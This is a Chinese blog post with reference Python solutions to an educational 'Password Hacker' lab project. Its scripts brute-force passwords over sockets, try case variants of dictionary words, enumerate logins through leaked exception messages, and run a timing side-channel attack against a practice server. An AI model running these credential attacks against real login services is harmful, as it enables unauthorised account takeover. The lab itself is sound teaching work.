python解决实际问题系列

最近偶然接触到了一个学习平台,Jerbrains Academy。pycharm和IDEA都是jetbrains旗下的产品。下面将以平台中一个Password Hacker项目作为例子,带你初步接触python。https://hyperskill.org/projects/80?track=2

这个项目是以一个进攻方和服务器管理员admin之间的攻防为背景展开的。所有参考代码在python3.9版本本地编译通过,工具是pycharm社区版

第一阶段的任务,相对简单,就是创建一个session,发送message并且关闭。

参考代码:

import socket
import sys
# - sys.argv[0] = file name
# - sys.argv[1] = hostname
# - sys.argv[2] = port
# - sys.argv[2] = message
# Create a new socket.
client_socket = socket.socket()
# Connect to a host and a port using the socket.
hostname=sys.argv[1]
port=int(sys.argv[2])
address=(hostname,port)
client_socket.connect(address)
# Send a message from the third command line argument to the host using the socket.

message=sys.argv[3]
message=message.encode()
client_socket.send(message)
# Receive the server’s response.
response=client_socket.recv(port)
response=response.decode()
# Print the server’s response.
print(response)
# Close the socket.
client_socket.close()

 

第二阶段的要求加入了简单的密码尝试

参考代码:

import socket
import sys
import string
import itertools

#input CMD
argumente = sys.argv
IP = argumente[1]
port = int(argumente[2])

#Connection to the server
client_socket = socket.socket()
client_socket.connect((IP, port))

#sending the flow of passwords
caractere = string.ascii_lowercase + string.digits

for i in range(1,4):
    brute_force = map(''.join, itertools.product(caractere, repeat=i))
    for j in brute_force:
        client_socket.send(j.encode())
        byte_response = client_socket.recv(1024)
        response = byte_response.decode()
        if response == 'Connection success!':
            print(j)
            break
        else:
            continue

client_socket.close()

 

第三阶段你需要对每个可能密码的大小写做尝试,参考代码:

 

import socket
import sys

import itertools



#input CMD
argumente = sys.argv
IP = argumente[1]
port = int(argumente[2])

#Connection to the server
client_socket = socket.socket()
client_socket.connect((IP, port))

#sending the flow of passwords
dictpath=r'f:\passwords.txt'
file=open(file=dictpath,mode='r')
text=file.readlines()

for line in text:
    line=line.strip("\n")
    s = map(lambda x: ''.join(x),
            itertools.product(*([letter.lower(), letter.upper()] if letter.isalpha() else [letter] for letter in line)))

    #print(list(s))
    for j in list(s):
        client_socket.send(j.encode())
        byte_response = client_socket.recv(1024)
        response = byte_response.decode()
        if response == 'Connection success!':
            print(j)
            exit()
        else:
            continue

client_socket.close()
file.close()

 

第四阶段难度较大,我自己也没写出来。涉及到捕获异常,不过题目中给了算法的逻辑,不难就是有点麻烦。参考代码:

import argparse
import itertools
import socket
import json
import time

import logging

logging.basicConfig(level=logging.INFO, format='%(asctime)s - %(name)s - %(levelname)s - %(message)s')
logger = logging.getLogger(__name__)

# logger.info("Start print log")
# logger.debug("Do something")
# logger.warning("Something maybe fail.")
# logger.info("Finish")


parser = argparse.ArgumentParser()
parser.add_argument('host')
parser.add_argument('port')
args = parser.parse_args()
combination = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890'
logpath=r'f:\stage4log.txt'

# 返回接收服务器的json串
def send_answer(login_password_dict):
    start = time.perf_counter()
    message = json.dumps(login_password_dict)
    message_2 = message.encode()
    client_socket.send(message_2)
    responce = client_socket.recv(1024)
    answer_json = responce.decode()
    end = time.perf_counter()
    dif = end - start
    logger.warning(str(json.loads(answer_json)))
    logger.warning(str(dif))
    return json.loads(answer_json),dif

#  客户端socket
with socket.socket() as client_socket:
    adress = (args.host, int(args.port))
    client_socket.connect(adress)
    login_password_dict = {}
    with open('f:\logins.txt', 'r') as file:
        while True:
            # Try all logins with an empty password.
            login_password_dict["login"] = file.readline().strip()
            login_password_dict["password"] = " "
            answer1,dif1 = send_answer(login_password_dict)
            # When you find the login, try out every possible password of length 1.
            if answer1["result"] != "Wrong login!":
                with open(logpath, 'w') as log1:
                    log1.write('find the right login' + str(dif1))
                    log1.write("\r\n")
                for i in combination:
                    login_password_dict["password"] = i
                    answer2,dif2 = send_answer(login_password_dict)
                    #When an exception occurs, you know that you found the first letter of the password.
                    if answer2["result"] == "Exception happened during login":
                        with open(logpath, 'a+') as log1:
                            log1.write('Exception happened during login' + str(dif2))
                            log1.write("\r\n")

                        letter = i
                        while True:
                            # Use the found login and the found letter to find the second letter of the password.
                            # Repeat until you receive the ‘success’ message.
                            generator = (x for x in itertools.product(combination, repeat=1))
                            for k in generator:
                                letter += k[0]
                                login_password_dict["password"] = letter
                                answer3,dif3= send_answer(login_password_dict)

                                if answer3["result"] == 'Connection success!':
                                    with open(logpath,'a+') as log1:
                                        log1.write('Connection success!'+str(dif3))
                                        log1.write("\r\n")

                                    print(json.dumps(login_password_dict))
                                    exit()
                                elif answer3["result"] == 'Exception happened during login':
                                    with open(logpath,'a+') as log1:
                                        log1.write('Exception happened during login'+str(dif3))
                                        log1.write("\r\n")



                                    login_password_dict["password"] = letter
                                    logger.info(str(letter))
                                else:
                                    letter = letter[:-1]

第五阶段题目中,管理员对异常进行了捕获,所以这时候你无法再通过报文分辨密码了,但是时间的脆弱性已经在题目中点了出来。如果第四阶段解决了,这一阶段不需要花大功夫。

参考代码:

import argparse
import itertools
import socket
import json
import time
import logging

logging.basicConfig(level=logging.INFO, format='%(asctime)s - %(name)s - %(levelname)s - %(message)s')
logger = logging.getLogger(__name__)
#
# logger.info("Start print log")
# logger.debug("Do something")
# logger.warning("Something maybe fail.")
# logger.info("Finish")


parser = argparse.ArgumentParser()
parser.add_argument('host')
parser.add_argument('port')
args = parser.parse_args()
combination = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890'
logpath = r'f:\stage5log.txt'


# 返回接收服务器的json串
def send_answer(login_password_dict):
    start = time.perf_counter()
    message = json.dumps(login_password_dict)
    message_2 = message.encode()
    client_socket.send(message_2)
    responce = client_socket.recv(1024)
    answer_json = responce.decode()
    end = time.perf_counter()
    dif = end - start
    logger.warning(str(dif))
    logger.warning(str(answer_json))
    return json.loads(answer_json), dif


#  客户端socket
with socket.socket() as client_socket:
    adress = (args.host, int(args.port))
    client_socket.connect(adress)
    login_password_dict = {}
    with open('f:\logins.txt', 'r') as file:
        while True:

            login_password_dict["login"] = file.readline().strip()
            login_password_dict["password"] = " "
            answer1, dif1 = send_answer(login_password_dict)
            # When you find the login, try out every possible password of length 1.
            if answer1["result"] != "Wrong login!":
                for i in combination:
                    login_password_dict["password"] = i
                    answer2, dif2 = send_answer(login_password_dict)
                    # When an exception occurs, you know that you found the first letter of the password.

                    if answer2["result"] == "Wrong password!" and dif2 > 0.03:
                        logger.info("find the right first letter"+i)
                        letter = i
                        while True:
                            # Use the found login and the found letter to find the second letter of the password.
                            # Repeat until you receive the ‘success’ message.
                            generator = (x for x in itertools.product(combination, repeat=1))
                            for k in generator:
                                letter += k[0]
                                login_password_dict["password"] = letter
                                answer3, dif3 = send_answer(login_password_dict)

                                # 如果返回结果为成功登录了,输出成功的结果并且结束程序。
                                if answer3["result"] == 'Connection success!':

                                    logger.info(str(json.dumps(login_password_dict)))

                                    print(json.dumps(login_password_dict))
                                    exit()
                                # 这里的elif情况是 发生了异常,说明密码的前面的几位和正确密码一致
                                elif answer3["result"] == 'Wrong password!' and dif3 > 0.03:
                                    logger.info("exception happended")

                                    login_password_dict["password"] = letter
                                # 这里的else指的后续真正是密码错误的情况
                                else:
                                    logger.info('wrong password')
                                    letter = letter[:-1]

 

已标记关键词 清除标记
相关推荐
简介 笔者当初为了学习JAVA,收集了很多经典源码,源码难易程度分为初级、中级、高级等,详情看源码列表,需要的可以直接下载! 这些源码反映了那时那景笔者对未来的盲目,对代码的热情、执着,对IT的憧憬、向往!此时此景,笔者只专注Android、Iphone等移动平台开发,看着这些源码心中有万分感慨,写此文章纪念那时那景! Java 源码包 Applet钢琴模拟程序java源码 2个目标文件,提供基本的音乐编辑功能。编辑音乐软件的朋友,这款实例会对你有所帮助。 Calendar万年历 1个目标文件 EJB 模拟银行ATM流程及操作源代码 6个目标文件,EJB来模拟银行ATM机的流程及操作:获取系统属性,初始化JNDI,取得Home对象的引用,创建EJB对象,并将当前的计数器初始化,调用每一个EJB对象的count()方法,保证Bean正常被激活和钝化,EJB对象是用完毕,从内存中清除,从账户中取出amt,如果amt>账户余额抛出异常,一个实体Bean可以表示不同的数据实例,我们应该通过主键来判断删除哪个数据实例…… ejbCreate函数用于初始化一个EJB实例 5个目标文件,演示Address EJB的实现 ,创建一个EJB测试客户端,得到名字上下文,查询jndi名,通过强制转型得到Home接口,getInitialContext()函数返回一个经过初始化的上下文,用client的getHome()函数调用Home接口函数得到远程接口的引用,用远程接口的引用访问EJB。 EJB中JNDI的使用源码例子 1个目标文件,JNDI的使用例子,有源代码,可以下载参考,JNDI的使用,初始化Context,它是连接JNDI树的起始点,查找你要的对象,打印找到的对象,关闭Context…… ftp文件传输 2个目标文件,FTP的目标是:(1)提高文件的共享性(计算机程序和/或数据),(2)鼓励间接地(通过程序)使用远程计算机,(3)保护用户因主机之间的文件存储系统导致的变化,(4)为了可靠和高效地传输,虽然用户可以在终端上直接地使用它,但是它的主要作用是供程序使用的。本规范尝试满足大型主机、微型主机、个人工作站、和TACs 的不同需求。例如,容易实现协议的设计。 Java EJB中有、无状态SessionBean的两个例子 两个例子,无状态SessionBean可会话Bean必须实现SessionBean,获取系统属性,初始化JNDI,取得Home对象的引用,创建EJB对象,计算利息等;在有状态SessionBean中,用累加器,以对话状态存储起来,创建EJB对象,并将当前的计数器初始化,调用每一个EJB对象的count()方法,保证Bean正常被激活和钝化,EJB对象是用完毕,从内存中清除…… Java Socket 聊天通信演示代码 2个目标文件,一个服务器,一个客户端。 Java Telnet客户端实例源码 一个目标文件,演示Socket的使用。 Java 组播组中发送和接受数据实例 3个目标文件。 Java读写文本文件的示例代码 1个目标文件。 java俄罗斯方块 一个目标文件。 Java非对称加密源码实例 1个目标文件 摘要:Java源码,算法相关,非对称加密   Java非对称加密源程序代码实例,本例中使用RSA加密技术,定义加密算法可用 DES,DESede,Blowfish等。   设定字符串为“张三,你好,我是李四”   产生张三的密钥对(keyPairZhang)   张三生成公钥(publicKeyZhang)并发送给李四,这里发送的是公钥的数组字节   通过网络或磁盘等方式,把公钥编码传送给李四,李四接收到张三编码后的公钥,将其解码,李四用张三的公钥加密信息,并发送给李四,张三用自己的私钥解密从李四处收到的信息…… Java利用DES私钥对称加密代码实例 同上 java聊天室 2个目标文件,简单。 java模拟掷骰子2个 1个目标文件,输出演示。 java凭图游戏 一个目标文件,简单。 java求一个整数的因子 如题。 Java生成密钥的实例 1个目标文件 摘要:Java源码,算法相关,密钥   Java生成密钥、保存密钥的实例源码,通过本源码可以了解到Java如何产生单钥加密的密钥(myKey)、产生双钥的密钥对(keyPair)、如何保存公钥的字节数组、保存私钥到文件privateKey.dat、如何用Java对象序列化保存私钥,通常应对私钥加密后再保存、如何从文件中得到公钥编码的字节数组、如何从字节数组解码公钥。 Java数据压缩与传输实例 1个目标文件 摘要:Java源码,文件操作,数据压缩,文件传输   Java数据压缩与传输实例,可以学习一下实例化套按字、得到文件输入流、压缩输入流、文件输出流、实例化缓冲
©️2020 CSDN 皮肤主题: 游动-白 设计师:白松林 返回首页